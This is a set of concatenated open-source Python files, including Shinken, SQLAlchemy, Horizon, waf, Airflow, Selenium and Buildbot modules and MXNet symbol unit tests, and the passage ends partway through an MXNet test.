"convert long int to dotted quad string"
return socket.inet_ntoa(struct.pack('I',n))
def limit_f(signal_in, limit):
if (signal_in > abs(limit)):
return abs(limit)
elif (signal_in <= -abs(limit)):
return -abs(limit)
else:
return signal_in
def clamp_value_f(value,lower_limit,upper_limit):
if (value < lower_limit):
value = lower_limit;
elif (value > upper_limit):
value = upper_limit;
return value;
def minimum_f(input1,input2):
if (math.fabs(input1) > math.fabs(input2)):
return input2
return input1
def approx_equal(in_1,in_2,max_delta):
if abs(in_1 - in_2) <= max_delta :
return True
return False
|
vveliev/selenium | refs/heads/master | py/test/__init__.py | 2454 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
|
wbsavage/shinken | refs/heads/branch-1.4 | shinken/modules/pnp_ui.py | 1 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class is for linking the WebUI with PNP,
for mainly get graphs and links.
"""
import socket
from shinken.log import logger
from shinken.basemodule import BaseModule
properties = {
'daemons': ['webui'],
'type': 'pnp_webui'
}
# called by the plugin manager
def get_instance(plugin):
logger.info("Get an PNP UI module for plugin %s" % plugin.get_name())
instance = PNP_Webui(plugin)
return instance
class PNP_Webui(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.uri = getattr(modconf, 'uri', None)
self.username = getattr(modconf, 'username', None)
self.password = getattr(modconf, 'password', '')
if not self.uri:
raise Exception('The WebUI PNP module is missing uri parameter.')
self.uri = self.uri.strip()
if not self.uri.endswith('/'):
self.uri += '/'
# Change YOURSERVERNAME by our server name if we got it
if 'YOURSERVERNAME' in self.uri:
my_name = socket.gethostname()
self.uri = self.uri.replace('YOURSERVERNAME', my_name)
# Try to connect if we got true parameter
def init(self):
pass
# To load the webui application
def load(self, app):
self.app = app
# For an element, give the number of elements in
# the perf_data
def get_number_of_metrics(self, elt):
perf_data = elt.perf_data.strip()
elts = perf_data.split(' ')
elts = [e for e in elts if e != '']
return len(elts)
# Give the link for the PNP UI, with a Name
def get_external_ui_link(self):
return {'label': 'PNP4', 'uri': self.uri}
# Ask for an host or a service the graph UI that the UI should
# give to get the graph image link and PNP page link too.
# for now, the source variable does nothing. Values passed to this variable can be :
# 'detail' for the element detail page
# 'dashboard' for the dashboard widget
# you can customize the url depending on this value. (or not)
def get_graph_uris(self, elt, graphstart, graphend, source = 'detail'):
if not elt:
return []
t = elt.__class__.my_type
r = []
if t == 'host':
nb_metrics = self.get_number_of_metrics(elt)
for i in range(nb_metrics):
v = {}
v['link'] = self.uri + 'index.php/graph?host=%s&srv=_HOST_' % elt.get_name()
v['img_src'] = self.uri + 'index.php/image?host=%s&srv=_HOST_&view=0&source=%d&start=%d&end=%d' % (elt.get_name(), i, graphstart, graphend)
r.append(v)
return r
if t == 'service':
nb_metrics = self.get_number_of_metrics(elt)
for i in range(nb_metrics):
v = {}
v['link'] = self.uri + 'index.php/graph?host=%s&srv=%s' % (elt.host.host_name, elt.service_description)
v['img_src'] = self.uri + 'index.php/image?host=%s&srv=%s&view=0&source=%d&start=%d&end=%d' % (elt.host.host_name, elt.service_description, i, graphstart, graphend)
r.append(v)
return r
# Oups, bad type?
return []
|
tmxdyf/CouchPotatoServer | refs/heads/master | libs/sqlalchemy/connectors/mysqldb.py | 18 | """Define behaviors common to MySQLdb dialects.
Currently includes MySQL and Drizzle.
"""
from sqlalchemy.connectors import Connector
from sqlalchemy.engine import base as engine_base, default
from sqlalchemy.sql import operators as sql_operators
from sqlalchemy import exc, log, schema, sql, types as sqltypes, util
from sqlalchemy import processors
import re
# the subclassing of Connector by all classes
# here is not strictly necessary
class MySQLDBExecutionContext(Connector):
@property
def rowcount(self):
if hasattr(self, '_rowcount'):
return self._rowcount
else:
return self.cursor.rowcount
class MySQLDBCompiler(Connector):
def visit_mod(self, binary, **kw):
return self.process(binary.left) + " %% " + self.process(binary.right)
def post_process_text(self, text):
return text.replace('%', '%%')
class MySQLDBIdentifierPreparer(Connector):
def _escape_identifier(self, value):
value = value.replace(self.escape_quote, self.escape_to_quote)
return value.replace("%", "%%")
class MySQLDBConnector(Connector):
driver = 'mysqldb'
supports_unicode_statements = False
supports_sane_rowcount = True
supports_sane_multi_rowcount = True
supports_native_decimal = True
default_paramstyle = 'format'
@classmethod
def dbapi(cls):
# is overridden when pymysql is used
return __import__('MySQLdb')
def do_executemany(self, cursor, statement, parameters, context=None):
rowcount = cursor.executemany(statement, parameters)
if context is not None:
context._rowcount = rowcount
def create_connect_args(self, url):
opts = url.translate_connect_args(database='db', username='user',
password='passwd')
opts.update(url.query)
util.coerce_kw_type(opts, 'compress', bool)
util.coerce_kw_type(opts, 'connect_timeout', int)
util.coerce_kw_type(opts, 'read_timeout', int)
util.coerce_kw_type(opts, 'client_flag', int)
util.coerce_kw_type(opts, 'local_infile', int)
# Note: using either of the below will cause all strings to be returned
# as Unicode, both in raw SQL operations and with column types like
# String and MSString.
util.coerce_kw_type(opts, 'use_unicode', bool)
util.coerce_kw_type(opts, 'charset', str)
# Rich values 'cursorclass' and 'conv' are not supported via
# query string.
ssl = {}
for key in ['ssl_ca', 'ssl_key', 'ssl_cert', 'ssl_capath', 'ssl_cipher']:
if key in opts:
ssl[key[4:]] = opts[key]
util.coerce_kw_type(ssl, key[4:], str)
del opts[key]
if ssl:
opts['ssl'] = ssl
# FOUND_ROWS must be set in CLIENT_FLAGS to enable
# supports_sane_rowcount.
client_flag = opts.get('client_flag', 0)
if self.dbapi is not None:
try:
CLIENT_FLAGS = __import__(
self.dbapi.__name__ + '.constants.CLIENT'
).constants.CLIENT
client_flag |= CLIENT_FLAGS.FOUND_ROWS
except (AttributeError, ImportError):
self.supports_sane_rowcount = False
opts['client_flag'] = client_flag
return [[], opts]
def _get_server_version_info(self, connection):
dbapi_con = connection.connection
version = []
r = re.compile('[.\-]')
for n in r.split(dbapi_con.get_server_info()):
try:
version.append(int(n))
except ValueError:
version.append(n)
return tuple(version)
def _extract_error_code(self, exception):
return exception.args[0]
def _detect_charset(self, connection):
"""Sniff out the character set in use for connection results."""
# Note: MySQL-python 1.2.1c7 seems to ignore changes made
# on a connection via set_character_set()
if self.server_version_info < (4, 1, 0):
try:
return connection.connection.character_set_name()
except AttributeError:
# < 1.2.1 final MySQL-python drivers have no charset support.
# a query is needed.
pass
# Prefer 'character_set_results' for the current connection over the
# value in the driver. SET NAMES or individual variable SETs will
# change the charset without updating the driver's view of the world.
#
# If it's decided that issuing that sort of SQL leaves you SOL, then
# this can prefer the driver value.
rs = connection.execute("SHOW VARIABLES LIKE 'character_set%%'")
opts = dict([(row[0], row[1]) for row in self._compat_fetchall(rs)])
if 'character_set_results' in opts:
return opts['character_set_results']
try:
return connection.connection.character_set_name()
except AttributeError:
# Still no charset on < 1.2.1 final...
if 'character_set' in opts:
return opts['character_set']
else:
util.warn(
"Could not detect the connection character set with this "
"combination of MySQL server and MySQL-python. "
"MySQL-python >= 1.2.2 is recommended. Assuming latin1.")
return 'latin1'
|
zouyapeng/horizon | refs/heads/stable/juno | openstack_dashboard/dashboards/project/stacks/sro.py | 92 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template.defaultfilters import title # noqa
from django.template.loader import render_to_string
from horizon.utils import filters
def stack_info(stack, stack_image):
stack.stack_status_desc = title(
filters.replace_underscores(stack.stack_status))
if stack.stack_status_reason:
stack.stack_status_reason = title(
filters.replace_underscores(stack.stack_status_reason)
)
context = {}
context['stack'] = stack
context['stack_image'] = stack_image
return render_to_string('project/stacks/_stack_info.html',
context)
def resource_info(resource):
resource.resource_status_desc = title(
filters.replace_underscores(resource.resource_status)
)
if resource.resource_status_reason:
resource.resource_status_reason = title(
filters.replace_underscores(resource.resource_status_reason)
)
context = {}
context['resource'] = resource
return render_to_string('project/stacks/_resource_info.html',
context)
|
Designist/audacity | refs/heads/master | lib-src/lv2/sord/waflib/Tools/fc_scan.py | 183 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import re
from waflib import Utils,Task,TaskGen,Logs
from waflib.TaskGen import feature,before_method,after_method,extension
from waflib.Configure import conf
INC_REGEX="""(?:^|['">]\s*;)\s*(?:|#\s*)INCLUDE\s+(?:\w+_)?[<"'](.+?)(?=["'>])"""
USE_REGEX="""(?:^|;)\s*USE(?:\s+|(?:(?:\s*,\s*(?:NON_)?INTRINSIC)?\s*::))\s*(\w+)"""
MOD_REGEX="""(?:^|;)\s*MODULE(?!\s*PROCEDURE)(?:\s+|(?:(?:\s*,\s*(?:NON_)?INTRINSIC)?\s*::))\s*(\w+)"""
re_inc=re.compile(INC_REGEX,re.I)
re_use=re.compile(USE_REGEX,re.I)
re_mod=re.compile(MOD_REGEX,re.I)
class fortran_parser(object):
def __init__(self,incpaths):
self.seen=[]
self.nodes=[]
self.names=[]
self.incpaths=incpaths
def find_deps(self,node):
txt=node.read()
incs=[]
uses=[]
mods=[]
for line in txt.splitlines():
m=re_inc.search(line)
if m:
incs.append(m.group(1))
m=re_use.search(line)
if m:
uses.append(m.group(1))
m=re_mod.search(line)
if m:
mods.append(m.group(1))
return(incs,uses,mods)
def start(self,node):
self.waiting=[node]
while self.waiting:
nd=self.waiting.pop(0)
self.iter(nd)
def iter(self,node):
path=node.abspath()
incs,uses,mods=self.find_deps(node)
for x in incs:
if x in self.seen:
continue
self.seen.append(x)
self.tryfind_header(x)
for x in uses:
name="USE@%s"%x
if not name in self.names:
self.names.append(name)
for x in mods:
name="MOD@%s"%x
if not name in self.names:
self.names.append(name)
def tryfind_header(self,filename):
found=None
for n in self.incpaths:
found=n.find_resource(filename)
if found:
self.nodes.append(found)
self.waiting.append(found)
break
if not found:
if not filename in self.names:
self.names.append(filename)
|
DinoCow/airflow | refs/heads/master | airflow/api/common/experimental/delete_dag.py | 8 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Delete DAGs APIs."""
import logging
from sqlalchemy import or_
from airflow import models
from airflow.exceptions import DagNotFound
from airflow.models import DagModel, TaskFail
from airflow.models.serialized_dag import SerializedDagModel
from airflow.utils.session import provide_session
log = logging.getLogger(__name__)
@provide_session
def delete_dag(dag_id: str, keep_records_in_log: bool = True, session=None) -> int:
"""
:param dag_id: the dag_id of the DAG to delete
:param keep_records_in_log: whether keep records of the given dag_id
in the Log table in the backend database (for reasons like auditing).
The default value is True.
:param session: session used
:return count of deleted dags
"""
log.info("Deleting DAG: %s", dag_id)
dag = session.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag is None:
raise DagNotFound(f"Dag id {dag_id} not found")
# Scheduler removes DAGs without files from serialized_dag table every dag_dir_list_interval.
# There may be a lag, so explicitly removes serialized DAG here.
if SerializedDagModel.has_dag(dag_id=dag_id, session=session):
SerializedDagModel.remove_dag(dag_id=dag_id, session=session)
count = 0
for model in models.base.Base._decl_class_registry.values(): # noqa pylint: disable=protected-access
if hasattr(model, "dag_id"):
if keep_records_in_log and model.__name__ == 'Log':
continue
cond = or_(model.dag_id == dag_id, model.dag_id.like(dag_id + ".%"))
count += session.query(model).filter(cond).delete(synchronize_session='fetch')
if dag.is_subdag:
parent_dag_id, task_id = dag_id.rsplit(".", 1)
for model in TaskFail, models.TaskInstance:
count += (
session.query(model).filter(model.dag_id == parent_dag_id, model.task_id == task_id).delete()
)
# Delete entries in Import Errors table for a deleted DAG
# This handles the case when the dag_id is changed in the file
session.query(models.ImportError).filter(models.ImportError.filename == dag.fileloc).delete(
synchronize_session='fetch'
)
return count
|
livioc/selenium | refs/heads/master | py/selenium/webdriver/common/touch_actions.py | 43 | """
The Touch Actions implementation
"""
from selenium.webdriver.remote.command import Command
class TouchActions(object):
"""
Generate touch actions. Works like ActionChains; actions are stored in the
TouchActions object and are fired with perform().
"""
def __init__(self, driver):
"""
Creates a new TouchActions object.
:Args:
- driver: The WebDriver instance which performs user actions.
It should be with touchscreen enabled.
"""
self._driver = driver
self._actions = []
def perform(self):
"""
Performs all stored actions.
"""
for action in self._actions:
action()
def tap(self, on_element):
"""
Taps on a given element.
:Args:
- on_element: The element to tap.
"""
self._actions.append(lambda:
self._driver.execute(Command.SINGLE_TAP, {'element': on_element.id}))
return self
def double_tap(self, on_element):
"""
Double taps on a given element.
:Args:
- on_element: The element to tap.
"""
self._actions.append(lambda:
self._driver.execute(Command.DOUBLE_TAP, {'element': on_element.id}))
return self
def tap_and_hold(self, xcoord, ycoord):
"""
Touch down at given coordinates.
:Args:
- xcoord: X Coordinate to touch down.
- ycoord: Y Coordinate to touch down.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_DOWN, {
'x': int(xcoord),
'y': int(ycoord)}))
return self
def move(self, xcoord, ycoord):
"""
Move held tap to specified location.
:Args:
- xcoord: X Coordinate to move.
- ycoord: Y Coordinate to move.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_MOVE, {
'x': int(xcoord),
'y': int(ycoord)}))
return self
def release(self, xcoord, ycoord):
"""
Release previously issued tap 'and hold' command at specified location.
:Args:
- xcoord: X Coordinate to release.
- ycoord: Y Coordinate to release.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_UP, {
'x': int(xcoord),
'y': int(ycoord)}))
return self
def scroll(self, xoffset, yoffset):
"""
Touch and scroll, moving by xoffset and yoffset.
:Args:
- xoffset: X offset to scroll to.
- yoffset: Y offset to scroll to.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_SCROLL, {
'xoffset': int(xoffset),
'yoffset': int(yoffset)}))
return self
def scroll_from_element(self, on_element, xoffset, yoffset):
"""
Touch and scroll starting at on_element, moving by xoffset and yoffset.
:Args:
- on_element: The element where scroll starts.
- xoffset: X offset to scroll to.
- yoffset: Y offset to scroll to.
"""
self._actions.append(lambda:
self._driver.execute(Command.TOUCH_SCROLL, {
'element': on_element.id,
'xoffset': int(xoffset),
'yoffset': int(yoffset)}))
return self
def long_press(self, on_element):
"""
Long press on an element.
:Args:
- on_element: The element to long press.
"""
self._actions.append(lambda:
self._driver.execute(Command.LONG_PRESS, {'element': on_element.id}))
return self
def flick(self, xspeed, yspeed):
"""
Flicks, starting anywhere on the screen.
:Args:
- xspeed: The X speed in pixels per second.
- yspeed: The Y speed in pixels per second.
"""
self._actions.append(lambda:
self._driver.execute(Command.FLICK, {
'xspeed': int(xspeed),
'yspeed': int(yspeed)}))
return self
def flick_element(self, on_element, xoffset, yoffset, speed):
"""
Flick starting at on_element, and moving by the xoffset and yoffset
with specified speed.
:Args:
- on_element: Flick will start at center of element.
- xoffset: X offset to flick to.
- yoffset: Y offset to flick to.
- speed: Pixels per second to flick.
"""
self._actions.append(lambda:
self._driver.execute(Command.FLICK, {
'element': on_element.id,
'xoffset': int(xoffset),
'yoffset': int(yoffset),
'speed': int(speed)}))
return self
# Context manager so TouchActions can be used in a 'with .. as' statements.
def __enter__(self):
return self # Return created instance of self.
def __exit__(self, _type, _value, _traceback):
pass # Do nothing, does not require additional cleanup. |
mitya57/debian-buildbot | refs/heads/master | buildbot/test/unit/test_util_ansicodes.py | 3 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from buildbot.util.ansicodes import parse_ansi_sgr
from twisted.trial import unittest
class TestAnsiCodes(unittest.TestCase):
def runTest(self, string, expected):
ret = parse_ansi_sgr(string)
self.assertEqual(ret, expected)
def test_ansi0m(self):
self.runTest("mfoo", ("foo", []))
def test_ansi1m(self):
self.runTest("33mfoo", ("foo", ["33"]))
def test_ansi2m(self):
self.runTest("1;33mfoo", ("foo", ["1", "33"]))
def test_ansi5m(self):
self.runTest("1;2;3;4;33mfoo", ("foo", ["1", "2", "3", "4", "33"]))
def test_ansi_notm(self):
self.runTest("33xfoo", ("foo", []))
def test_ansi_invalid(self):
self.runTest("<>foo", ("\033[<>foo", []))
def test_ansi_invalid_start_by_semicolon(self):
self.runTest(";3m", ("\033[;3m", []))
|
kaifabian/lana-dashboard | refs/heads/master | lana_dashboard/urls.py | 1 | """lana_dashboard URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from lana_dashboard.lana_api import urls as api_urls
from lana_dashboard.lana_data import urls as data_urls
from lana_dashboard.lana_generator import urls as generator_urls
from lana_dashboard.main import views as main
from lana_dashboard.usermanagement import urls as user_urls, views as usermanagement
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', main.index, name='main-index'),
url(r'^lana-apis.js', main.apis, name='main-apis'),
url(r'^login$', usermanagement.login, name='usermanagement-login'),
url(r'^logout$', usermanagement.logout, name='usermanagement-logout'),
url(r'^api/', include(api_urls, namespace='lana_api')),
url(r'^lana/', include(data_urls, namespace='lana_data')),
url(r'^config/', include(generator_urls, namespace='lana_generator')),
url(r'^users/', include(user_urls, namespace='usermanagement')),
]
|
ContinuumIO/quepy | refs/heads/master | tests/testapp/dsl.py | 9 | #!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2012, Machinalis S.R.L.
# This file is part of quepy and is distributed under the Modified BSD License.
# You should have received a copy of license in the LICENSE file.
#
# Authors: Rafael Carrascosa <[email protected]>
# Gonzalo Garcia Berrotaran <[email protected]>
"""
Intermediate representation for testapp quepy.
"""
|
fullfanta/mxnet | refs/heads/master | tests/python/unittest/test_symbol.py | 2 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import copy
import os
import re
import mxnet as mx
import numpy as np
from common import assertRaises, models
from mxnet.base import NotImplementedForSymbol
from mxnet.test_utils import discard_stderr
import pickle as pkl
def test_symbol_basic():
mlist = []
mlist.append(models.mlp2())
for m in mlist:
m.list_arguments()
m.list_outputs()
def test_symbol_bool():
x = mx.symbol.Variable('x')
assertRaises(NotImplementedForSymbol, bool, x)
def test_symbol_compose():
data = mx.symbol.Variable('data')
net1 = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=10)
net1 = mx.symbol.FullyConnected(data=net1, name='fc2', num_hidden=100)
net1.list_arguments() == ['data',
'fc1_weight', 'fc1_bias',
'fc2_weight', 'fc2_bias']
net2 = mx.symbol.FullyConnected(name='fc3', num_hidden=10)
net2 = mx.symbol.Activation(data=net2, act_type='relu')
net2 = mx.symbol.FullyConnected(data=net2, name='fc4', num_hidden=20)
composed = net2(fc3_data=net1, name='composed')
multi_out = mx.symbol.Group([composed, net1])
assert len(multi_out.list_outputs()) == 2
assert len(multi_out) == 2
def test_symbol_copy():
data = mx.symbol.Variable('data')
data_2 = copy.deepcopy(data)
data_3 = copy.copy(data)
assert data.tojson() == data_2.tojson()
assert data.tojson() == data_3.tojson()
def test_symbol_internal():
data = mx.symbol.Variable('data')
oldfc = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=10)
net1 = mx.symbol.FullyConnected(data=oldfc, name='fc2', num_hidden=100)
assert net1.list_arguments() == ['data', 'fc1_weight', 'fc1_bias', 'fc2_weight', 'fc2_bias']
internal = net1.get_internals()
fc1 = internal['fc1_output']
assert fc1.list_arguments() == oldfc.list_arguments()
def test_symbol_children():
data = mx.symbol.Variable('data')
oldfc = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=10)
net1 = mx.symbol.FullyConnected(data=oldfc, name='fc2', num_hidden=100)
assert net1.get_children().list_outputs() == ['fc1_output', 'fc2_weight', 'fc2_bias']
assert len(net1.get_children()) == 3
assert net1.get_children().get_children().list_outputs() == ['data', 'fc1_weight', 'fc1_bias']
assert len(net1.get_children().get_children()) == 3
assert net1.get_children()['fc2_weight'].list_arguments() == ['fc2_weight']
assert net1.get_children()['fc2_weight'].get_children() is None
data = mx.sym.Variable('data')
sliced = mx.sym.SliceChannel(data, num_outputs=3, name='slice')
concat = mx.sym.Concat(*list(sliced))
assert concat.get_children().list_outputs() == \
['slice_output0', 'slice_output1', 'slice_output2']
assert sliced.get_children().list_outputs() == ['data']
def test_symbol_pickle():
mlist = [models.mlp2(), models.conv()]
data = pkl.dumps(mlist)
mlist2 = pkl.loads(data)
for x, y in zip(mlist, mlist2):
assert x.tojson() == y.tojson()
def test_symbol_saveload():
sym = models.mlp2()
fname = 'tmp_sym.json'
sym.save(fname)
data2 = mx.symbol.load(fname)
# save because of order
assert sym.tojson() == data2.tojson()
os.remove(fname)
def test_symbol_infer_type():
data = mx.symbol.Variable('data')
f32data = mx.symbol.Cast(data=data, dtype='float32')
fc1 = mx.symbol.FullyConnected(data = f32data, name='fc1', num_hidden=128)
mlp = mx.symbol.SoftmaxOutput(data = fc1, name = 'softmax')
arg, out, aux = mlp.infer_type(data=np.float16)
assert arg == [np.float16, np.float32, np.float32, np.float32]
assert out == [np.float32]
assert aux == []
def test_symbol_infer_shape():
num_hidden = 128
num_dim = 64
num_sample = 10
data = mx.symbol.Variable('data')
prev = mx.symbol.Variable('prevstate')
x2h = mx.symbol.FullyConnected(data=data, name='x2h', num_hidden=num_hidden)
h2h = mx.symbol.FullyConnected(data=prev, name='h2h', num_hidden=num_hidden)
out = mx.symbol.Activation(data=mx.sym.elemwise_add(x2h, h2h), name='out', act_type='relu')
# shape inference will fail because information is not available for h2h
ret = out.infer_shape(data=(num_sample, num_dim))
assert ret == (None, None, None)
arg, out_shapes, aux_shapes = out.infer_shape_partial(data=(num_sample, num_dim))
arg_shapes = dict(zip(out.list_arguments(), arg))
assert arg_shapes['data'] == (num_sample, num_dim)
assert arg_shapes['x2h_weight'] == (num_hidden, num_dim)
assert arg_shapes['h2h_weight'] == ()
# now we can do full shape inference
state_shape = out_shapes[0]
arg, out_shapes, aux_shapes = out.infer_shape(data=(num_sample, num_dim), prevstate=state_shape)
arg_shapes = dict(zip(out.list_arguments(), arg))
assert arg_shapes['data'] == (num_sample, num_dim)
assert arg_shapes['x2h_weight'] == (num_hidden, num_dim)
assert arg_shapes['h2h_weight'] == (num_hidden, num_hidden)
def test_symbol_infer_shape_var():
"Test specifying shape information when constructing a variable"
shape = (2, 3)
a = mx.symbol.Variable('a', shape=shape)
b = mx.symbol.Variable('b')
c = mx.symbol.elemwise_add(a, b)
arg_shapes, out_shapes, aux_shapes = c.infer_shape()
assert arg_shapes[0] == shape
assert arg_shapes[1] == shape
assert out_shapes[0] == shape
overwrite_shape = (5, 6)
arg_shapes, out_shapes, aux_shapes = c.infer_shape(a=overwrite_shape)
assert arg_shapes[0] == overwrite_shape
assert arg_shapes[1] == overwrite_shape
assert out_shapes[0] == overwrite_shape
def test_symbol_fluent():
has_grad = set(['flatten', 'expand_dims', 'flip', 'tile', 'transpose', 'sum', 'nansum', 'prod',
'nanprod', 'mean', 'max', 'min', 'reshape', 'broadcast_to', 'split',
'broadcast_axes', 'pad', 'swapaxes', 'slice', 'slice_axis', 'slice_like',
'take', 'one_hot', 'pick', 'sort', 'topk', 'argsort', 'argmax', 'argmin',
'clip', 'abs', 'sign', 'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
'degrees', 'radians', 'sinh', 'cosh', 'tanh', 'arcsinh', 'arccosh', 'arctanh',
'exp', 'expm1', 'log', 'log10', 'log2', 'log1p', 'sqrt', 'rsqrt',
'square', 'reciprocal' 'reshape_like', 'cbrt', 'rcbrt', 'relu', 'sigmoid',
'softmax', 'log_softmax', 'rint', 'ceil', 'floor', 'trunc', 'fix'])
def check_fluent_regular(func, kwargs, shape=(5, 17, 1), equal_nan=False):
with mx.name.NameManager():
data = mx.symbol.Variable('data')
regular = getattr(mx.symbol, func)(data, name=func+'0', **kwargs)
fluent = getattr(data, func)(**kwargs)
check_symbol_consistency(regular, fluent, {'ctx': mx.context.current_context(),
'data': shape},
skip_grad=func not in has_grad,
equal_nan=equal_nan)
for func in ['flatten', 'norm', 'round', 'rint', 'fix', 'floor', 'ceil', 'trunc', 'zeros_like',
'ones_like', 'abs', 'sign', 'sin', 'cos', 'degrees', 'radians',
'exp', 'expm1', 'square', 'reciprocal', 'argmax_channel']:
check_fluent_regular(func, {})
for func in ['arccosh', 'arcsin', 'arccos', 'arctan', 'tan', 'sinh', 'cosh', 'tanh',
'arcsinh', 'arctanh', 'log', 'log10', 'log2', 'log1p', 'sqrt', 'rsqrt',
'cbrt', 'rcbrt', 'relu', 'sigmoid', 'softmax', 'log_softmax']:
check_fluent_regular(func, {}, equal_nan=True)
for func in ['expand_dims', 'flip', 'sort', 'topk', 'argsort', 'argmax', 'argmin']:
check_fluent_regular(func, {'axis': 1})
check_fluent_regular('one_hot', {'depth': 15})
check_fluent_regular('tile', {'reps': (1,2)})
check_fluent_regular('repeat', {'repeats': 3})
check_fluent_regular('transpose', {'axes': (1,0,2)})
check_fluent_regular('split', {'axis': 2, 'num_outputs': 3}, shape=(5, 17, 6))
check_fluent_regular('slice', {'begin': (2, 5, 1), 'end': (4, 7, 6)}, shape=(5, 17, 6))
check_fluent_regular('slice_axis', {'axis': 1, 'begin': 5, 'end': 7})
check_fluent_regular('slice_like', {'axes': (0, -2), 'shape_like': mx.sym.zeros((3, 3))})
check_fluent_regular('clip', {'a_min': 0.25, 'a_max': 0.75})
check_fluent_regular('broadcast_axes', {'axis': (2,), 'size': (5,)})
check_fluent_regular('pad', {'mode': 'constant', 'pad_width': (0,0,0,0,3,0,0,4)}, shape=(5, 17, 2, 3))
check_fluent_regular('reshape_like', {'rhs': mx.sym.ones((30, 17))}, shape=(5, 17, 2, 3))
for func in ['sum', 'nansum', 'prod', 'nanprod', 'mean', 'max', 'min', 'norm']:
check_fluent_regular(func, {'axis': (1, 2)})
check_fluent_regular('reshape', {'shape': (17, 1, 5)})
check_fluent_regular('broadcast_to', {'shape': (5, 17, 47)})
check_fluent_regular('squeeze', {'axis': (1, 3)}, shape=(2, 1, 3, 1, 4))
def check_symbol_consistency(sym1, sym2, ctx, skip_grad=False, equal_nan=False):
assert sym1.list_arguments() == sym2.list_arguments()
assert sym1.list_auxiliary_states() == sym2.list_auxiliary_states()
assert sym1.list_outputs() == sym2.list_outputs()
mx.test_utils.check_consistency([sym1, sym2], ctx_list=[ctx, ctx],
grad_req='null' if skip_grad else 'write',
equal_nan=equal_nan)
def test_load_000800():
with mx.AttrScope(ctx_group='stage1'):
data = mx.symbol.Variable('data', lr_mult=0.2)
weight = mx.sym.Variable(name='fc1_weight', lr_mult=1.2)
fc1 = mx.symbol.FullyConnected(data = data, weight=weight, name='fc1', num_hidden=128, wd_mult=0.3)
act1 = mx.symbol.Activation(data = fc1, name='relu1', act_type="relu")
set_stage1 = set(act1.list_arguments())
with mx.AttrScope(ctx_group='stage2'):
